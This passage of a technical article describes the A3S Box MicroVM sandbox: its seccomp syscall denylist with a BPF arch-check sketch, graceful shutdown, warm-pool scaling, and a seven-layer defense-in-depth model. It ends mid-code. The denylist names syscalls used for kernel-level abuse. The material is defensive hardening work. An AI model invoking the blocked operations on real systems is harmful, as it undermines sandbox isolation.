
&lt;p&gt;Seccomp (Secure Computing Mode) filters syscalls through BPF (Berkeley Packet Filter) programs. A3S Box's default Seccomp policy blocks 16 dangerous syscalls:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Syscall&lt;/th&gt;
&lt;th&gt;Reason for Blocking&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;kexec_load&lt;/code&gt; / &lt;code&gt;kexec_file_load&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent loading a new kernel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;reboot&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent system reboot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;swapon&lt;/code&gt; / &lt;code&gt;swapoff&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent swap space manipulation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;init_module&lt;/code&gt; / &lt;code&gt;finit_module&lt;/code&gt; / &lt;code&gt;delete_module&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent loading/unloading kernel modules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;acct&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent enabling process accounting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;settimeofday&lt;/code&gt; / &lt;code&gt;clock_settime&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Prevent modifying system time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;personality&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent changing execution domain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;keyctl&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent manipulating kernel keyring&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;perf_event_open&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent performance monitoring (side-channel risk)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bpf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent loading BPF programs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;userfaultfd&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevent userspace page fault handling (exploitation risk)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The Seccomp filter also includes architecture validation: only allows syscalls for x86_64 (&lt;code&gt;0xC000_003E&lt;/code&gt;) or aarch64 (&lt;code&gt;0xC000_00B7&lt;/code&gt;) architectures, preventing bypass via 32-bit compatibility mode.&lt;/p&gt;
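
&lt;p&gt;For illustration, the arch-validation prologue of such a filter can be sketched in classic BPF (the opcode values are the standard BPF encodings; this is not the actual A3S Box filter program):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;// Illustrative classic-BPF sketch of a seccomp arch check.
#[repr(C)]
struct SockFilter { code: u16, jt: u8, jf: u8, k: u32 }

const AUDIT_ARCH_X86_64: u32 = 0xC000_003E;
const SECCOMP_RET_KILL_PROCESS: u32 = 0x8000_0000;

fn arch_check_prologue() -&amp;gt; [SockFilter; 3] {
    [
        // ld [4]: load seccomp_data.arch (offset 4 in the struct)
        SockFilter { code: 0x20, jt: 0, jf: 0, k: 4 },
        // jeq AUDIT_ARCH_X86_64: on a match, skip the kill instruction
        SockFilter { code: 0x15, jt: 1, jf: 0, k: AUDIT_ARCH_X86_64 },
        // ret KILL_PROCESS: reached only on an architecture mismatch
        SockFilter { code: 0x06, jt: 0, jf: 0, k: SECCOMP_RET_KILL_PROCESS },
    ]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The per-syscall allow/deny rules would follow this prologue in the same instruction array.&lt;/p&gt;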

&lt;h3&gt;
  
  
  14.5 Graceful Shutdown
&lt;/h3&gt;

&lt;p&gt;When receiving a SIGTERM signal, Guest Init executes a graceful shutdown flow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Set the &lt;code&gt;SHUTDOWN_REQUESTED&lt;/code&gt; flag&lt;/li&gt;
&lt;li&gt;Forward SIGTERM to all child processes&lt;/li&gt;
&lt;li&gt;Wait for child processes to exit (timeout &lt;code&gt;CHILD_SHUTDOWN_TIMEOUT_MS = 5000ms&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Send SIGKILL to any still-alive child processes after timeout&lt;/li&gt;
&lt;li&gt;Call &lt;code&gt;libc::sync()&lt;/code&gt; to flush filesystem buffers&lt;/li&gt;
&lt;li&gt;Exit with the container process's exit code (&lt;code&gt;128 + signal&lt;/code&gt; for signal termination)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This two-phase shutdown ensures applications have the opportunity to perform cleanup operations (such as closing database connections, flushing logs), while guaranteeing the shutdown process doesn't hang indefinitely.&lt;/p&gt;
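
&lt;p&gt;The exit-code mapping in step 6 follows the common shell convention; as a tiny sketch (the status enum here is mine, standing in for the real wait status):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;enum ChildStatus {
    Exited(i32),   // normal exit with a code
    Signaled(i32), // terminated by a signal
}

// Propagate the child's exit code; map signal deaths to 128 + signo.
fn init_exit_code(status: ChildStatus) -&amp;gt; i32 {
    match status {
        ChildStatus::Exited(code) =&amp;gt; code,
        ChildStatus::Signaled(signo) =&amp;gt; 128 + signo,
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A child killed by SIGTERM (signal 15) thus surfaces as exit code 143.&lt;/p&gt;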




&lt;h2&gt;
  
  
  15. Warm Pool: The Ultimate Solution to Cold Starts
&lt;/h2&gt;

&lt;h3&gt;
  
  
  15.1 The Nature of the Cold Start Problem
&lt;/h3&gt;

&lt;p&gt;Even though A3S Box has optimized MicroVM cold start time to approximately 200ms, in some scenarios this is still not enough:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Real-time API services&lt;/strong&gt;: P99 latency requirement &amp;lt; 100ms; a 200ms cold start would cause first-request timeouts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Interactive AI Agents&lt;/strong&gt;: Users expect instant responses; any perceptible delay degrades experience&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Burst traffic&lt;/strong&gt;: Large numbers of requests arriving in a short time; serial VM startup causes request backlog&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Warm Pool solves this by pre-starting a batch of MicroVMs — when a request arrives, a ready VM is directly allocated, achieving near-zero latency response.&lt;/p&gt;

&lt;h3&gt;
  
  
  15.2 Warm Pool Architecture
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;                    +-----------------------------+
                    |         WarmPool             |
                    |                              |
  acquire() ------&amp;gt; |  +-----+ +-----+ +-----+   |
  (get VM)          |  | VM1 | | VM2 | | VM3 |   | &amp;lt;- Idle VM queue
                    |  |Ready| |Ready| |Ready|   |
  release() ------&amp;gt; |  +-----+ +-----+ +-----+   |
  (return VM)       |                              |
                    |  +----------------------+    |
                    |  |  Background Task      |    |
                    |  |  - Evict expired VMs  |    |
                    |  |  - Replenish min_idle  |    |
                    |  |  - Auto-scaling        |    |
                    |  +----------------------+    |
                    |                              |
                    |  +----------------------+    |
                    |  |  PoolScaler           |    |
                    |  |  - Sliding window stats|    |
                    |  |  - Dynamic min_idle    |    |
                    |  +----------------------+    |
                    +-----------------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  15.3 Core Configuration
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;PoolConfig&lt;/code&gt; defines the warm pool's behavioral parameters:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;PoolConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;          &lt;span class="c1"&gt;// Default false&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;min_idle&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;usize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Minimum idle VM count, default 1&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_size&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;usize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Maximum VM count in pool, default 5&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;idle_ttl_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;// Idle VM time-to-live, default 300 seconds&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Tuning Advice&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;min_idle&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Set based on average concurrency; too high wastes resources&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;max_size&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Set based on host memory; each VM ~512 MiB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;idle_ttl_secs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;300&lt;/td&gt;
&lt;td&gt;Shorten for sparse traffic to save resources&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  15.4 Acquire and Release
&lt;/h3&gt;

&lt;p&gt;The core operations of the warm pool are &lt;code&gt;acquire()&lt;/code&gt; and &lt;code&gt;release()&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;acquire() (get VM)&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Try to pop a Ready-state VM from the idle queue&lt;/li&gt;
&lt;li&gt;If hit, record hit statistics and return directly&lt;/li&gt;
&lt;li&gt;If miss, record miss statistics and start a new VM on demand (slow path)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;release() (return VM)&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Check if the pool is full (current count &amp;gt;= max_size)&lt;/li&gt;
&lt;li&gt;Not full: put VM back in idle queue, reset creation time&lt;/li&gt;
&lt;li&gt;Full: destroy VM&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Hit/miss statistics are the key input for auto-scaling.&lt;/p&gt;
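
&lt;p&gt;The fast/slow path above can be sketched with VM handles reduced to plain ids (names are illustrative, not the real &lt;code&gt;WarmPool&lt;/code&gt; API):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;use std::collections::VecDeque;

struct Pool {
    idle: VecDeque&amp;lt;u32&amp;gt;, // ready VMs
    max_size: usize,
    hits: u64,
    misses: u64,
    next_id: u32,
}

impl Pool {
    fn acquire(&amp;amp;mut self) -&amp;gt; u32 {
        match self.idle.pop_front() {
            Some(vm) =&amp;gt; {
                self.hits += 1;   // fast path: ready VM handed out
                vm
            }
            None =&amp;gt; {
                self.misses += 1; // slow path: boot a new VM on demand
                self.next_id += 1;
                self.next_id
            }
        }
    }

    fn release(&amp;amp;mut self, vm: u32) {
        if self.idle.len() &amp;lt; self.max_size {
            self.idle.push_back(vm); // back into the idle queue
        }
        // pool full: the VM would be destroyed instead (omitted here)
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;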

&lt;h3&gt;
  
  
  15.5 Auto-Scaling
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;PoolScaler&lt;/code&gt; dynamically adjusts &lt;code&gt;min_idle&lt;/code&gt; based on hit rate within a sliding window, implementing adaptive resource management:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ScalingPolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;scale_up_threshold&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;f64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// Default 0.3 (30% miss rate triggers scale-up)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;scale_down_threshold&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;f64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Default 0.05 (5% miss rate triggers scale-down)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_min_idle&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;usize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Upper limit for min_idle&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;cooldown_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;         &lt;span class="c1"&gt;// Cooldown period, default 60 seconds&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;window_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Statistics window, default 120 seconds&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scaling decision logic:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Calculate miss rate in sliding window = miss_count / (hit_count + miss_count)

If miss rate &amp;gt; scale_up_threshold (0.3):
    effective_min_idle += 1  (not exceeding max_min_idle)
    Enter cooldown period

If miss rate &amp;lt; scale_down_threshold (0.05):
    effective_min_idle -= 1  (not below configured min_idle)
    Enter cooldown period
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The cooldown period (default 60 seconds) prevents frequent adjustments during traffic fluctuations, avoiding "oscillation."&lt;/p&gt;
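
&lt;p&gt;The decision above reduces to a small pure function (a sketch using the default thresholds; parameter names are mine, and the cooldown bookkeeping is omitted):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;// Compute the new effective min_idle from sliding-window stats.
fn next_min_idle(hits: u64, misses: u64, current: usize,
                 configured_min: usize, max_min_idle: usize) -&amp;gt; usize {
    let total = hits + misses;
    if total == 0 {
        return current; // no traffic in the window: leave as-is
    }
    let miss_rate = misses as f64 / total as f64;
    if miss_rate &amp;gt; 0.30 {
        (current + 1).min(max_min_idle)               // scale up
    } else if miss_rate &amp;lt; 0.05 {
        current.saturating_sub(1).max(configured_min) // scale down
    } else {
        current
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;For example, 5 hits and 5 misses (50% miss rate) raise &lt;code&gt;min_idle&lt;/code&gt; by one; 100 hits and 1 miss (&amp;lt;5%) lower it by one, never below the configured floor.&lt;/p&gt;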

&lt;h3&gt;
  
  
  15.6 Background Maintenance
&lt;/h3&gt;

&lt;p&gt;The warm pool starts a background async task that performs maintenance at &lt;code&gt;max(idle_ttl / 5, 5s)&lt;/code&gt; intervals:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Evaluate auto-scaling&lt;/strong&gt;: Call &lt;code&gt;PoolScaler&lt;/code&gt; to calculate new &lt;code&gt;effective_min_idle&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Evict expired VMs&lt;/strong&gt;: Check each idle VM's lifetime; destroy those exceeding &lt;code&gt;idle_ttl_secs&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replenish VMs&lt;/strong&gt;: If idle VM count is below &lt;code&gt;effective_min_idle&lt;/code&gt;, start new VMs to replenish&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  15.7 Event Tracking
&lt;/h3&gt;

&lt;p&gt;All key warm pool operations emit events for monitoring and debugging:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Trigger&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.acquired&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM acquired&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.released&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM returned&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.created&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;New VM created&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.vm.evicted&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM evicted due to expiry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.replenish&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VM replenishment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.autoscale&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Auto-scaling triggered&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;pool.drained&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pool drained (on shutdown)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  15.8 Graceful Drain
&lt;/h3&gt;

&lt;p&gt;When the system shuts down, the &lt;code&gt;drain()&lt;/code&gt; method performs a graceful drain:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Send shutdown signal to background maintenance task&lt;/li&gt;
&lt;li&gt;Wait for background task to complete&lt;/li&gt;
&lt;li&gt;Destroy all idle VMs&lt;/li&gt;
&lt;li&gt;Emit &lt;code&gt;pool.drained&lt;/code&gt; event&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This ensures no orphan VM processes are left behind when the system shuts down.&lt;/p&gt;




&lt;h2&gt;
  
  
  16. Seven-Layer Defense-in-Depth Security Model
&lt;/h2&gt;

&lt;h3&gt;
  
  
  16.1 The Philosophy of Defense in Depth
&lt;/h3&gt;

&lt;p&gt;There is a fundamental principle in security: &lt;strong&gt;no single security measure is perfect&lt;/strong&gt;. Whether encryption algorithms, access controls, or hardware isolation, all may have unknown vulnerabilities. The Defense in Depth strategy stacks multiple independent security mechanisms so that an attacker must simultaneously breach all layers to achieve their goal.&lt;/p&gt;

&lt;p&gt;A3S Box implements seven layers of defense in depth, with each layer independently increasing the cost of attack:&lt;/p&gt;

&lt;h3&gt;
  
  
  16.2 Layer 1: Hardware Virtualization Isolation
&lt;/h3&gt;

&lt;p&gt;This is the outermost and strongest isolation. Each MicroVM runs in an independent hardware virtualization domain (Intel VT-x / AMD-V / Apple HVF). The processor distinguishes between host mode and guest mode at the hardware level, and any sensitive operation triggers a VM Exit.&lt;/p&gt;

&lt;p&gt;Even if an attacker gains root privileges inside a MicroVM and exploits a Linux kernel vulnerability, they can only affect that MicroVM itself — because kernel vulnerabilities cannot break through the hardware virtualization boundary.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.3 Layer 2: Memory Encryption (TEE)
&lt;/h3&gt;

&lt;p&gt;On hardware supporting AMD SEV-SNP or Intel TDX, the MicroVM's memory is hardware-encrypted. Each VM has an independent AES encryption key managed by the processor's security processor. Even if an attacker has physical access to the host (including cold boot attacks, DMA attacks), they cannot read the plaintext of VM memory.&lt;/p&gt;

&lt;p&gt;This layer extends the threat model from "trust the host" to "trust no one" — only trust the hardware.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.4 Layer 3: Independent Kernel
&lt;/h3&gt;

&lt;p&gt;Each MicroVM runs its own Linux kernel. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A kernel vulnerability in one MicroVM does not affect other MicroVMs&lt;/li&gt;
&lt;li&gt;Kernel configuration can be optimized for the workload (minimizing attack surface)&lt;/li&gt;
&lt;li&gt;Kernel versions can be updated independently without affecting other workloads&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  16.5 Layer 4: Namespace Isolation
&lt;/h3&gt;

&lt;p&gt;Inside the MicroVM, container processes are further isolated through Linux namespaces. Mount, PID, IPC, and UTS namespaces are enabled by default. This layer matters because even when multiple processes run inside the same MicroVM, they remain isolated from one another at the OS level.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.6 Layer 5: Capability Stripping
&lt;/h3&gt;

&lt;p&gt;The Linux Capability mechanism splits root's full power into 41 fine-grained capabilities. A3S Box strips all Capabilities by default, retaining only those explicitly needed by the application. This follows the principle of least privilege — processes only have the minimum set of permissions needed to complete their tasks.&lt;/p&gt;
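&lt;p&gt;At the policy level, default-deny capability resolution is simple set arithmetic. A minimal sketch (the capability names and the rule that drops override adds are assumptions modeled on the usual &lt;code&gt;--cap-add&lt;/code&gt;/&lt;code&gt;--cap-drop&lt;/code&gt; semantics; the real enforcement happens via &lt;code&gt;capset&lt;/code&gt; in Guest Init):&lt;/p&gt;

```rust
use std::collections::BTreeSet;

// Default-deny: start from an empty capability set and add back only what
// was explicitly requested. Drops win over adds; "ALL" clears everything.
fn effective_caps(cap_add: &[&str], cap_drop: &[&str]) -> BTreeSet<String> {
    let mut caps: BTreeSet<String> = BTreeSet::new(); // everything dropped by default
    for c in cap_add {
        caps.insert(c.to_string());
    }
    for c in cap_drop {
        if *c == "ALL" { caps.clear(); } else { caps.remove(*c); }
    }
    caps
}
```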

&lt;h3&gt;
  
  
  16.7 Layer 6: Seccomp BPF Syscall Filtering
&lt;/h3&gt;

&lt;p&gt;Even if a process has certain Capabilities, the Seccomp BPF filter can still block specific syscalls. A3S Box blocks 16 dangerous syscalls by default (such as &lt;code&gt;kexec_load&lt;/code&gt;, &lt;code&gt;bpf&lt;/code&gt;, &lt;code&gt;perf_event_open&lt;/code&gt;), and validates the syscall architecture (preventing bypass via 32-bit compatibility mode).&lt;/p&gt;
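&lt;p&gt;Conceptually, the filter is a denylist check with an architecture guard in front. A sketch of the decision logic (the real filter is compiled to BPF and enforced in-kernel; only the three syscalls named above are listed here, the remaining entries of the 16-item default denylist are omitted):&lt;/p&gt;

```rust
// Syscalls explicitly named in the text; the real default denylist has 16 entries.
const BLOCKED_SYSCALLS: &[&str] = &["kexec_load", "bpf", "perf_event_open"];

fn syscall_allowed(arch_matches: bool, name: &str) -> bool {
    // Architecture is validated first, preventing bypass via 32-bit compat mode.
    if !arch_matches {
        return false;
    }
    !BLOCKED_SYSCALLS.contains(&name)
}
```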

&lt;h3&gt;
  
  
  16.8 Layer 7: no-new-privileges
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;PR_SET_NO_NEW_PRIVS&lt;/code&gt; flag ensures the process and all its descendants cannot gain new privileges via &lt;code&gt;execve()&lt;/code&gt;. This prevents attack paths that escalate privileges by executing SUID/SGID binaries.&lt;/p&gt;

&lt;h3&gt;
  
  
  16.9 Security Configuration Propagation
&lt;/h3&gt;

&lt;p&gt;Security configuration is passed from the host to Guest Init via a set of environment variables:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Environment Variable&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_SECCOMP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Seccomp mode&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;default&lt;/code&gt; / &lt;code&gt;unconfined&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_NO_NEW_PRIVS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no-new-privileges&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;1&lt;/code&gt; / &lt;code&gt;0&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_PRIVILEGED&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Privileged mode&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;1&lt;/code&gt; / &lt;code&gt;0&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_CAP_ADD&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Added Capabilities&lt;/td&gt;
&lt;td&gt;&lt;code&gt;NET_ADMIN,SYS_TIME&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_SEC_CAP_DROP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Removed Capabilities&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ALL&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Privileged mode (&lt;code&gt;--privileged&lt;/code&gt;) simultaneously sets &lt;code&gt;seccomp=unconfined&lt;/code&gt;, &lt;code&gt;no_new_privileges=false&lt;/code&gt;, and &lt;code&gt;cap_add=ALL&lt;/code&gt;. It should only be used during development and debugging, and is strongly discouraged in production.&lt;/p&gt;
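&lt;p&gt;On the Guest Init side, consuming these variables reduces to straightforward parsing. A hedged sketch, assuming a config struct shaped like the table above (the field names, defaults, and the &lt;code&gt;parse_security_env&lt;/code&gt; helper are illustrative, not the actual implementation):&lt;/p&gt;

```rust
// Hypothetical Guest Init-side parsing of the A3S_SEC_* variables.
#[derive(Debug, PartialEq)]
struct SecurityConfig {
    seccomp: String,
    no_new_privs: bool,
    privileged: bool,
    cap_add: Vec<String>,
    cap_drop: Vec<String>,
}

// Takes a lookup closure so it can be tested without touching the process env.
fn parse_security_env(get: impl Fn(&str) -> Option<String>) -> SecurityConfig {
    let list = |v: Option<String>| -> Vec<String> {
        v.map(|s| s.split(',').filter(|p| !p.is_empty()).map(str::to_string).collect())
            .unwrap_or_default()
    };
    SecurityConfig {
        seccomp: get("A3S_SEC_SECCOMP").unwrap_or_else(|| "default".into()),
        // Secure defaults assumed: no-new-privileges on unless explicitly "0".
        no_new_privs: get("A3S_SEC_NO_NEW_PRIVS").as_deref() != Some("0"),
        privileged: get("A3S_SEC_PRIVILEGED").as_deref() == Some("1"),
        cap_add: list(get("A3S_SEC_CAP_ADD")),
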